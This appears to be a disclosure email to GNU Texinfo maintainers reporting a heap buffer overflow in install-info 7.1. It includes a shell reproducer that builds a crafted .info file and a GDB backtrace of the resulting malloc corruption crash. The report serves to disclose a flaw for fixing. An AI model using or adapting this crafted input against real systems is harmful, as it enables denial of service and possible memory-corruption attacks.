Dear Texinfo Maintainers,
I hope you are doing well. I have discovered a heap buffer overflow in the
install-info utility (GNU texinfo 7.1, 2023).
Tested Environment:
- Version: install-info (GNU texinfo) 7.1
- OS: Ubuntu 24.04.3 LTS
Steps to Reproduce:
1) Create a malicious .info file with excessive line-break expansion:
echo "START-INFO-DIR-ENTRY" > overflow.info
echo -n "* Crash: (crash). " >> overflow.info
for i in {1..100}; do echo "A." >> overflow.info; done
echo "END-INFO-DIR-ENTRY" >> overflow.info
2) Run: install-info overflow.info normal.dir
Observed Result: The program crashes with "malloc(): corrupted top size"
and a SIGABRT.
GDB Backtrace (Summary):
malloc(): corrupted top size
Program received signal SIGABRT, Aborted.
Download failed: Invalid argument. Continuing without source file ./nptl/./nptl/pthread_kill.c.
__pthread_kill_implementation (no_tid=0, signo=6, threadid=<optimized out>) at ./nptl/pthread_kill.c:44
warning: 44 ./nptl/pthread_kill.c: No such file or directory
(gdb) bt
#0  __pthread_kill_implementation (no_tid=0, signo=6, threadid=<optimized out>) at ./nptl/pthread_kill.c:44
#1  __pthread_kill_internal (signo=6, threadid=<optimized out>) at ./nptl/pthread_kill.c:78
#2  __GI___pthread_kill (threadid=<optimized out>, signo=signo@entry=6) at ./nptl/pthread_kill.c:89
#3  0x00007ffff7c4527e in __GI_raise (sig=sig@entry=6) at ../sysdeps/posix/raise.c:26
#4  0x00007ffff7c288ff in __GI_abort () at ./stdlib/abort.c:79
#5  0x00007ffff7c297b6 in __libc_message_impl (fmt=fmt@entry=0x7ffff7dce8d7 "%s\n") at ../sysdeps/posix/libc_fatal.c:134
#6  0x00007ffff7ca8ff5 in malloc_printerr (str=str@entry=0x7ffff7dcc6f7 "malloc(): corrupted top size") at ./malloc/malloc.c:5775
#7  0x00007ffff7cac2fc in _int_malloc (av=av@entry=0x7ffff7e03ac0 <main_arena>, bytes=bytes@entry=1659) at ./malloc/malloc.c:4447
#8  0x00007ffff7cad812 in __GI___libc_malloc (bytes=bytes@entry=1659) at ./malloc/malloc.c:3328
#9  0x0000555555559438 in xmalloc (s=1659) at ../gnulib/lib/xmalloc.c:43
#10 format_entry (outstr_len=0x5555555721a0, outstr_out=0x555555572198, width=<optimized out>, align=35, calign=33, desc_len=399,
    desc=0x555555572340 "A. A. A. A. A. A. A. A. A. A. A. A.
A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A.
A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A. A.
"..., name_len=17, name=0x555555572320 "* Crash: (crash).")
    at /usr/src/texinfo-7.1-3build2/install-info/install-info.c:1446
#11 reformat_new_entries (maxwidth_cli=<optimized out>, align_cli=<optimized out>, calign_cli=<optimized out>, entries=<optimized out>) at /usr/src/texinfo-7.1-3build2/install-info/install-info.c:1716
#12 main (argc=<optimized out>, argv=<optimized out>) at /usr/src/texinfo-7.1-3build2/install-info/install-info.c:2451
(gdb)
(gdb)
I would appreciate it if you could confirm this finding.
Best regards,
Leenear